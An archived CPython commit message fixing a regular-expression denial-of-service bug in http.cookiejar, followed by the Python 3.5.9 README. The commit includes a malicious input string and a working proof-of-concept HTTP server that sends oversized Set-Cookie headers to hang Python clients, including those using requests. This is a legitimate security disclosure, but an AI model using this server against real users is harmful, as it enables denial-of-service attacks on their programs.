Staging
v0.5.1
https://github.com/python/cpython
Revision 55a6a16a46239a71b635584e532feb8b17ae7fdf authored by Victor Stinner on 03 April 2020, 01:37:32 UTC, committed by GitHub on 03 April 2020, 01:37:32 UTC
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).

LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.

The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to

    \d+-\w+-\d+(\s*\s*\s*)$

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

    LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.

You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.

    from http.server import BaseHTTPRequestHandler, HTTPServer

    def make_set_cookie_value(n_spaces):
        spaces = " " * n_spaces
        expiry = f"1-c-1{spaces}!"
        return f"b;Expires={expiry}"

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.log_request(204)
            self.send_response_only(204)  # Don't bother sending Server and Date
            n_spaces = (
                int(self.path[1:])  # Can GET e.g. /100 to test shorter sequences
                if len(self.path) > 1 else
                65506  # Max header line length 65536
            )
            value = make_set_cookie_value(n_spaces)
            for i in range(99):  # Not necessary, but we can have up to 100 header lines
                self.send_header("Set-Cookie", value)
            self.end_headers()

    if __name__ == "__main__":
        HTTPServer(("", 44020), Handler).serve_forever()

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

    import http.cookiejar, urllib.request
    cj = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    r = opener.open("http://localhost:44020/")

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

    import requests
    requests.get("http://localhost:44020/")

* Regression test for http.cookiejar REDoS

If we regress, this test will take a very long time.

* Improve performance of http.cookiejar.ISO_DATE_RE

A string like

"444444" + (" " * 2000) + "A"

could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.

(cherry picked from commit 1b779bfb8593739b11cbb988ef82a883ec9d077e)

Co-authored-by: bcaller <bcaller@users.noreply.github.com>
1 parent ed07522
Raw File
Tip revision: 55a6a16a46239a71b635584e532feb8b17ae7fdf authored by Victor Stinner on 03 April 2020, 01:37:32 UTC
bpo-38804: Fix REDoS in http.cookiejar (GH-17157) (#17344)
Tip revision: 55a6a16
README
This is Python version 3.5.9
============================

Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010,
2011, 2012, 2013, 2014, 2015, 2016, 2017, 2018, 2019 Python Software
Foundation.  All rights reserved.

Python 3.x is a new version of the language, which is incompatible with the
2.x line of releases.  The language is mostly the same, but many details,
especially how built-in objects like dictionaries and strings work,
have changed considerably, and a lot of deprecated features have finally
been removed.

Using Python
------------

Installable Python kits, and information about using Python, are available at
`python.org`_.

.. _python.org: https://www.python.org/


Build Instructions
------------------

On Unix, Linux, BSD, OSX, and Cygwin:

    ./configure
    make
    make test
    sudo make install

This will install Python as python3.

You can pass many options to the configure script; run "./configure --help" to
find out more.  On OSX and Cygwin, the executable is called python.exe;
elsewhere it's just python.

On Mac OS X, if you have configured Python with --enable-framework, you should
use "make frameworkinstall" to do the installation.  Note that this installs
the Python executable in a place that is not normally on your PATH, you may
want to set up a symlink in /usr/local/bin.

On Windows, see PCbuild/readme.txt.

If you wish, you can create a subdirectory and invoke configure from there.
For example:

    mkdir debug
    cd debug
    ../configure --with-pydebug
    make
    make test

(This will fail if you *also* built at the top-level directory.
You should do a "make clean" at the toplevel first.)

To get an optimized build of Python, "configure --enable-optimizations" before
you run make.  This sets the default make targets up to enable Profile Guided
Optimization (PGO) and may be used to auto-enable Link Time Optimization (LTO)
on some platforms.  For more details, see the sections bellow.


Profile Guided Optimization
---------------------------

PGO takes advantage of recent versions of the GCC or Clang compilers.
If ran, "make profile-opt" will do several steps.

First, the entire Python directory is cleaned of temporary files that
may have resulted in a previous compilation.

Then, an instrumented version of the interpreter is built, using suitable
compiler flags for each flavour. Note that this is just an intermediary
step and the binary resulted after this step is not good for real life
workloads, as it has profiling instructions embedded inside.

After this instrumented version of the interpreter is built, the Makefile
will automatically run a training workload. This is necessary in order to
profile the interpreter execution. Note also that any output, both stdout
and stderr, that may appear at this step is suppressed.

Finally, the last step is to rebuild the interpreter, using the information
collected in the previous one. The end result will be a Python binary
that is optimized and suitable for distribution or production installation.


Link Time Optimization
----------------------

Enabled via configure's --with-lto flag.  LTO takes advantages of recent
compiler toolchains ability to optimize across the otherwise arbitrary .o file
boundary when building final executables or shared libraries for additional
performance gains.


What's New
----------

We have a comprehensive overview of the changes in the "What's New in
Python 3.5" document, found at

    http://docs.python.org/3.5/whatsnew/3.5.html

For a more detailed change log, read Misc/NEWS (though this file, too,
is incomplete, and also doesn't list anything merged in from the 2.7
release under development).

If you want to install multiple versions of Python see the section below
entitled "Installing multiple versions".


Documentation
-------------

Documentation for Python 3.5 is online, updated daily:

    http://docs.python.org/3.5/

It can also be downloaded in many formats for faster access.  The documentation
is downloadable in HTML, PDF, and reStructuredText formats; the latter version
is primarily for documentation authors, translators, and people with special
formatting requirements.

If you would like to contribute to the development of Python, relevant
documentation is available at:

    http://docs.python.org/devguide/

For information about building Python's documentation, refer to Doc/README.txt.


Converting From Python 2.x to 3.x
---------------------------------

Python starting with 2.6 contains features to help locating code that needs to
be changed, such as optional warnings when deprecated features are used, and
backported versions of certain key Python 3.x features.

A source-to-source translation tool, "2to3", can take care of the mundane task
of converting large amounts of source code.  It is not a complete solution but
is complemented by the deprecation warnings in 2.6.  See
http://docs.python.org/3.5/library/2to3.html for more information.


Testing
-------

To test the interpreter, type "make test" in the top-level directory.
The test set produces some output.  You can generally ignore the messages
about skipped tests due to optional features which can't be imported.
If a message is printed about a failed test or a traceback or core dump
is produced, something is wrong.

By default, tests are prevented from overusing resources like disk space and
memory.  To enable these tests, run "make testall".

IMPORTANT: If the tests fail and you decide to mail a bug report, *don't*
include the output of "make test".  It is useless.  Run the failing test
manually, as follows:

    ./python -m test -v test_whatever

(substituting the top of the source tree for '.' if you built in a different
directory).  This runs the test in verbose mode.


Installing multiple versions
----------------------------

On Unix and Mac systems if you intend to install multiple versions of Python
using the same installation prefix (--prefix argument to the configure script)
you must take care that your primary python executable is not overwritten by
the installation of a different version.  All files and directories installed
using "make altinstall" contain the major and minor version and can thus live
side-by-side.  "make install" also creates ${prefix}/bin/python3 which refers
to ${prefix}/bin/pythonX.Y.  If you intend to install multiple versions using
the same prefix you must decide which version (if any) is your "primary"
version.  Install that version using "make install".  Install all other
versions using "make altinstall".

For example, if you want to install Python 2.6, 2.7 and 3.5 with 2.7 being the
primary version, you would execute "make install" in your 2.7 build directory
and "make altinstall" in the others.


Issue Tracker and Mailing List
------------------------------

We're soliciting bug reports about all aspects of the language.  Fixes are also
welcome, preferably in unified diff format.  Please use the issue tracker:

    http://bugs.python.org/

If you're not sure whether you're dealing with a bug or a feature, use the
mailing list:

    python-dev@python.org

To subscribe to the list, use the mailman form:

    http://mail.python.org/mailman/listinfo/python-dev/


Proposals for enhancement
-------------------------

If you have a proposal to change Python, you may want to send an email to the
comp.lang.python or `python-ideas`_ mailing lists for initial feedback.  A Python
Enhancement Proposal (PEP) may be submitted if your idea gains ground.  All
current PEPs, as well as guidelines for submitting a new PEP, are listed at
http://www.python.org/dev/peps/.

.. _python-ideas: https://mail.python.org/mailman/listinfo/python-ideas/

Release Schedule
----------------

See PEP 478 for release details: http://www.python.org/dev/peps/pep-0478/


Copyright and License Information
---------------------------------

Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010,
2011, 2012, 2013, 2014, 2015, 2016, 2017, 2018, 2019 Python Software
Foundation.  All rights reserved.

Copyright (c) 2000 BeOpen.com.  All rights reserved.

Copyright (c) 1995-2001 Corporation for National Research Initiatives.  All
rights reserved.

Copyright (c) 1991-1995 Stichting Mathematisch Centrum.  All rights reserved.

See the file "LICENSE" for information on the history of this software,
terms & conditions for usage, and a DISCLAIMER OF ALL WARRANTIES.

This Python distribution contains *no* GNU General Public License (GPL) code,
so it may be used in proprietary projects.  There are interfaces to some GNU
code but these are entirely optional.

All trademarks referenced herein are property of their respective holders.
back to top